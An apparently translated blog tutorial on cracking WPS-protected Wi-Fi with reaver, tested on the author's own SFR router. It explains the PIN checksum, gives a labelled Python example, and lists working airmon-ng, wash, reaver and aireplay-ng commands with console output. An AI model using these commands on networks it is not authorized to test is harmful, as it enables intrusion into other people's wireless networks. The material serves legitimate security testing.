Today we are going to talk about reaver, a tool used to carry out attacks against WPS (Wi-Fi Protected Setup). First, a small reminder of the facts: reaver was created to test the security of wireless networks equipped with WPS. Put simply, it brute-forces the 8-digit PIN code used by the router in order to recover the famous WPA key that protects the network. At the time of its release it was a bit like getting into an amusement park without paying the entrance fee, because many routers were vulnerable to this attack.
Yes, but... since its release the access points have also evolved, and nowadays most of these attacks fail. Ready to test?
WPS works on the following principle: the PIN code consists of 8 digits. You're going to tell me that 8 digits makes a lot of possibilities to test... actually not really, when you know that the eighth digit is a checksum of the other 7. So we do not need to try all the possibilities, because the PIN code commits hara-kiri on its own.
Let us take the example of the following code: 34536896. We decompose it as 3x3 + 1x4 + 3x5 + 1x3 + 3x6 + 1x8 + 3x9 + 1x6 = 90; once we apply the modulo 10 we get 0, because we removed 9 × 10. Knowing how a PIN is composed at the base significantly reduces the number of tests, which gives a very fast attack on a vulnerable router. Reverse engineering has more than proved itself in the field, with default PIN generators for D-Link, TP-Link and so on.
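As an added example (not code from the original post), here is that checksum rule worked out in code on the post's own PIN 34536896. It also computes the keyspace that actually has to be searched, which is why reaver's progress line later on the page reports roughly 11,000 PINs rather than 10^8; the split into two separately acknowledged halves is standard WPS registrar behaviour, not something the post states explicitly.

```python
# Added example: WPS PIN checksum and effective keyspace (not from the original post).

def weighted_sum(pin8: str) -> int:
    """Weighted sum over all 8 digits exactly as the post computes it:
    digits at odd positions (1st, 3rd, 5th, 7th from the left) weigh 3,
    digits at even positions weigh 1. Gives 90 for 34536896."""
    if len(pin8) != 8 or not pin8.isdigit():
        raise ValueError("expected exactly 8 digits")
    return sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(pin8))


def is_valid_pin(pin8: str) -> bool:
    """A PIN is well-formed when the weighted sum is 0 modulo 10."""
    return len(pin8) == 8 and pin8.isdigit() and weighted_sum(pin8) % 10 == 0


def wps_checksum(first7: str) -> int:
    """Return the 8th (check) digit that makes a 7-digit prefix a valid PIN.
    For 3453689 the weighted sum is 84, so the check digit is (10 - 4) % 10 = 6."""
    if len(first7) != 7 or not first7.isdigit():
        raise ValueError("expected exactly 7 digits")
    partial = sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(first7))
    return (10 - partial % 10) % 10


def effective_keyspace() -> int:
    """Worst-case number of PIN attempts against a WPS registrar.
    The registrar acknowledges the first 4 digits (M4) and the last 4 digits (M6)
    separately, so the halves are searched independently: 10**4 candidates for
    the first half, and only 10**3 for the second half because its last digit
    is fixed by the checksum. Reaver's '10995 pins left' on this page is this
    total minus the few PINs it had already tried."""
    return 10**4 + 10**3


if __name__ == "__main__":
    print("34536896 weighted sum:", weighted_sum("34536896"))   # 90
    print("check digit for 3453689:", wps_checksum("3453689"))  # 6
    print("worst case attempts:", effective_keyspace())          # 11000
```

The PINs reaver tries in the console output further down (12345670, 22225672, 33335674) all pass `is_valid_pin`, which is how the tool avoids wasting attempts on PINs the AP would reject outright.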
What about our boxes? Here it comes.
Test configuration: a 9box from SFR and a computer running Kali Linux with an Alfa AWUS036H Wi-Fi card (RTL8187L driver). I strongly recommend this hardware for your tests.
1 - The basics
Put the card in monitor mode, sniff the surrounding Wi-Fi networks and start the test.
PS: I recommend stopping network-manager beforehand to avoid conflicts.
In a terminal, launch:
airmon-ng start wlan0
wash -i mon0
This will display the potentially vulnerable networks; check that the "WPS Locked" column is at zero (i.e. not locked). Now comes the reaver command, the great classic that was all the rage:
reaver -i mon0 -c 1 -b 00:11:22:33:44:55 -vv
But let's be serious... nowadays this command has little chance of working. If we want to stand a chance, we will prefer other options, for example:
reaver -i mon0 -b 30:7E:CB:AE:A3:44 -a -v -c 6 -r 1:60 -L -S
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Switching mon0 to channel 6
[?] Restore previous session for 30:7E:CB:AE:A3:44? [n/Y] n
[+] Waiting for beacon from 30:7E:CB:AE:A3:44
[+] Associated with 30:7E:CB:AE:A3:44 (ESSID: SFR_A340)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
One notices the immediate failure of the attack because of a timeout. How do we get past this stage? Simply with aireplay-ng:
aireplay-ng -1 120 -a 30:7E:CB:AE:A3:44 -e SFR_A340 -h 00:C0:CA:75:88:87 --ignore-negative-one mon0
One immediately sees the difference in the reaver console.
The attack then continues according to the parameters of the command; for the rest, here is the command:
reaver -i mon0 -c 6 -A -b 30:7E:CB:AE:A3:44 -vv -N -t 5 -L -r 1:60 -S
The main option to remember here is -r 1:60, which means pausing 60 seconds after every PIN. It seems a lot, but on some APs that is what it takes. Obviously you can adjust that at your discretion. Slower, but more efficient: reaver carries on its way.
[+] Entering recurring delay of 60 seconds
[+] Trying pin 22225672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 0.05% complete @ 2015-02-15 00:06:30 (86 seconds / pin)
[+] Max time remaining at this rate: 262:39:30 (10995 pins left to try)
[+] Entering recurring delay of 60 seconds
[+] Trying pin 33335674
Knowing full well that my 9box has no PIN configured, I stop the attack. Now let's look at an attempt with WPS enabled by default and reaver knowing the box's default PIN:
reaver -i mon0 -c 6 -A -b 30:7E:CB:AE:A3:44 -vv -p 6319308